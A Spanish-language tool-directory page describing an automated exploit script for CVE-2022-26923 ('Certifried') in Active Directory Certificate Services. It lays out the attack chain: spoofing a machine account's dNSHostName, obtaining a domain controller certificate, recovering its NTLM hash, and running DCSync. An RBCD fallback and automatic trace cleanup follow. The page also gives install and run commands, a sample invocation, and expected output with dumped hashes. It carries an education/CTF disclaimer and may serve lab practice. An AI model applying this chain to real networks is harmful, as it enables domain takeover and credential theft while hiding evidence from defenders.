Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-26923 — Explotación automatizada de CVE-2022-26923 (Certifried) | Kitploit
Herramientas/GitHubGitHub/nefhara/cve-2022-26923
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónCTFPruebas de PenetraciónAutenticaciónAprendizaje y EducaciónLabs y Práctica
GitHubnefhara/cve-2022-26923

CVE-2022-26923

Explotación automatizada de CVE-2022-26923 (Certifried)

2hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

CVE-2022-26923 – Exploit Certifried (Abuso de AD CS)

Explotación automatizada de CVE-2022-26923 (Certifried), permitiendo escalada de privilegios mediante el abuso de Servicios de Certificados de Active Directory (AD CS), con un fallback automático a Delegación Restringida Basada en Recursos (RBCD), y finalmente extrayendo el hash NTLM de una cuenta de administrador de dominio.

⚠️ Solo con fines educativos / Laboratorio / CTF

No usar en entornos no autorizados.


🎯 Descripción

Este script automatiza la siguiente cadena de ataque:

Método 1 — Clásico (Explotación Directa de CVE)

  1. Crear una cuenta de máquina controlada (nombre aleatorio para evitar conflictos)
  2. Suplantar el atributo dNSHostName para que coincida con el Controlador de Dominio
  3. Solicitar un certificado de máquina a través de AD CS
  4. Autenticarse usando el certificado → extraer el hash NTLM del DC mediante PKINIT
  5. Realizar un ataque DCSync con secretsdump.py usando el hash del DC

Método 2 — Fallback (RBCD) (automático si el Método 1 falla)

  1. Convertir PFX a PEM para usar con bloodyAD
  2. Configurar Delegación Restringida Basada en Recursos (RBCD) en el DC
  3. Agregar un SPN a la cuenta de máquina comprometida mediante impacket-addspn
  4. Solicitar un ticket S4U2Self + S4U2Proxy con getST.py
  5. Extraer el hash NTLM mediante secretsdump.py usando el ticket Kerberos

🔗 Vulnerabilidad

  • CVE-2022-26923 – "Certifried" — CVSS 8.8 (Alta)
  • Afecta a entornos de Active Directory que ejecutan AD CS
  • Permite a un usuario con pocos privilegios hacerse pasar por un Controlador de Dominio manipulando el atributo dNSHostName, provocando que la CA emita un certificado para la cuenta del DC

🛠 Herramientas Utilizadas


📦 Instalación de Dependencias

root@kitploit:~
pipx install impacket
pipx install certipy-ad
pipx install bloodyad
sudo apt install openssl

🚀 Uso

root@kitploit:~
chmod +x CVE-2022-26923.sh
./CVE-2022-26923.sh [options]

Opciones Disponibles

root@kitploit:~
-d, --dc-ip     Dirección IP del Controlador de Dominio
-D, --domain    Nombre del dominio (ej. corp.local)
-u, --user      Usuario de dominio válido (formato UPN: usuario@dominio)
-p, --pass      Contraseña del usuario
--verbose       Modo depuración: muestra todos los comandos ejecutados
-h, --help      Muestra este mensaje de ayuda

🧠 Ejemplo (HTB Certifried)

root@kitploit:~
./CVE-2022-26923.sh \
  -d 10.129.227.189 \
  -D certifried.htb \
  -u [email protected] \
  -p 'Ch4ng3m3!' \
  --verbose

Consejo: Antes de ejecutar, identifique el nombre exacto de la CA y la plantilla usando:

root@kitploit:~
certipy-ad find -u 'user@domain' -p 'Password' -target dc.domain -ns <DC_IP> -stdout

Luego actualice CA_NAME y TEMPLATE en los valores predeterminados del script según corresponda.


🔥 Salida Esperada

Dependiendo del entorno, una de las dos rutas tendrá éxito:

Método 1 (Clásico):

root@kitploit:~
[5] Classic authentication attempt (Recovering DC hash)...    [SUCCESS]
[+] NTLM Hash of the Domain Controller recovered: aad3b435b51404eeaad3b435b51404ee:6f9d...

[6] DCSync of administrator via secretsdump...
administrator:500:aad3b435...:<nthash>:::

Método 2 (Fallback RBCD):

root@kitploit:~
[5] Classic authentication attempt (Recovering DC hash)...    [FAILED]
[*] Switching to Fallback method (RBCD + SPN)...

[Fallback-5] Running secretsdump via RBCD ticket...
administrator:500:aad3b435...:<nthash>:::

La limpieza OPSEC se ejecuta automáticamente al final (o con Ctrl+C):

root@kitploit:~
[*] Starting trace cleanup (OPSEC)...
    [OK] Cleanup complete.

🏗 Flujo de Ataque Interno

root@kitploit:~
Creación de cuenta de máquina aleatoria (ej. PWN8472$)
              ↓
    Suplantación de dNSHostName → dc.domain.local
              ↓
  Verificación dinámica de sincronización LDAP (sondeo)
              ↓
  Solicitud de certificado vía RPC (Plantilla de máquina)
    [Reintento automático por timeout de NETBIOS hasta 5 veces]
              ↓
┌─────────────────────────────────────────┐
│         MÉTODO 1 — CLÁSICO              │
│   certipy-ad auth -pfx dc.pfx           │
│   → Hash NTLM del DC mediante PKINIT    │
│   → DCSync mediante secretsdump         │
└────────────────┬────────────────────────┘
                 │ [FAILS]
                 ▼
┌─────────────────────────────────────────┐
│         MÉTODO 2 — FALLBACK RBCD        │
│   Conversión PFX → PEM (openssl)        │
│   bloodyAD: add rbcd dc$ COMP$          │
│   impacket-addspn: SPN en COMP$         │
│   getST: S4U2Self + S4U2Proxy (cifs/)   │
│   secretsdump mediante ticket KRB5      │
└─────────────────────────────────────────┘
              ↓
 Limpieza OPSEC (trap EXIT/INT/TERM)
   - Eliminar atributo RBCD en DC
   - Eliminar cuenta de máquina (COMP$)
   - Limpiar archivos locales PFX / PEM / ccache

🔧 Problemas Conocidos y Solución de Problemas


⚠️ Descargo de Responsabilidad

Este proyecto se proporciona para:

  • Fines educativos y de investigación
  • Entornos de laboratorio personal
  • Desafíos CTF / HackTheBox / Capture-The-Flag
  • Compromisos de pruebas de penetración autorizadas (con aprobación por escrito)

El autor no asume ninguna responsabilidad por el uso no autorizado o ilegal de esta herramienta.

Descargar herramienta
ToolPropósito
certipy-adCreación/actualización de cuentas, solicitud de certificados, autenticación PKINIT
bloodyADManipulación de atributos RBCD (fallback)
impacket-addspnAdición de SPN en la cuenta de máquina (fallback)
impacket-getSTSolicitud de ticket S4U2Self + S4U2Proxy (fallback)
impacket-secretsdumpDCSync / extracción de hash NTLM
opensslConversión PFX → PEM (fallback)
SíntomaCausaSolución
NETBIOS connection timed outRetraso de RPC de AD CS en HTBManejado automáticamente (5 reintentos)
KDC_ERR_BADOPTION al ejecutar getSTSPN faltante en COMP$El script ahora usa impacket-addspn antes de getST
KDC_ERR_WRONG_REALM al ejecutar secretsdumpSPN incorrecto (LDAP vs cifs)El script usa SPN cifs/ para getST
Clock skew too greatDesviación de tiempo de Kerberossudo ntpdate <DC_IP> antes de ejecutar
Fallo en eliminación de cuenta de máquinaPermisos de AD insuficientes (normal)El script lo ignora correctamente con `
unrecognized arguments con certipy-adSintaxis incorrecta (formato antiguo de certipy)El script usa flags explícitas -u/-p/-target-ip